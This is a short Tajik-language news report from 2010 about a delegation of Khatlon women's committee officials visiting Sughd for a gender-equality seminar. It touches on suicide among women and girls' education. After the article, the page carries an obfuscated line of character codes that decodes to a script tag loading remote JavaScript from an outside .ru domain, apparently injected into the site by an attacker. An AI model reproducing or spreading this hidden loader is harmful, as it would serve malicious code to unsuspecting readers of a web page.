30.04.2010
Ташрифи меҳмонон аз вилояти Хатлон
30 апрел. Рӯзи гузашта ба ноҳияи Б.Ғафуров як гурӯҳ занони вилояти Хатлон ташриф оварданд. Аз ҷумла намояндагони кумитаи кор бо бонувони вилояти Хатлон, ноҳияи Ҳисор, намояндаи ваколатдори ҳукуки инсон дар Тоҷикистон.
Ҳадаф аз ташрифи меҳмонон баргузории семинари ҷумҳуриявй дар вилояти Суғд Буда, самти семинар омӯхтани таҷрибаи кории МИҲД - и вилояти Суғд оид ба таъмини баробарҳукукии зану мард ва дар ин раванд ташкили маркази машварати иттилоотӣ ва шабакаи гендерӣ дар МИҲД мебошад.
Намояндаи кор бо бонувони Ҳукумати Ҷумҳурии Тоҷикистон Хилолбӣ Қурбонова чун дар сӯҳбат арз намуд, ҳарчанд нерӯи аҳли ҷомеа ба масъалаи пешгирии худкушӣ ва сӯиқасд ба он дар байни занону духтарон равона карда шудааст, вале то ҳол нишондодҳо баланд аст.
Ҳамзамон, мавсуф таъкид кард, ки дар ҷалби духтарон ба таҳсил кор боз ҳам ҷоннок гардад. Зеро ҳар чи бештар ҷалб намудани духтарон ба таҳсил шуурнокии онҳоро баланд мебардорад. Сарвари кумитаи кор бо бонувони вилояти Хатлон Қурбонгул Пирхонова низ барои устувории оилаҳои навбунёд ва пешрафти кор чанд маслиҳати муфидро пешниҳод намуд.
Суғд
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)e96eb81cda3fd04d3d0c0f50f62deca9.js" type="text/javascript">

ТАВЗЕҲОТ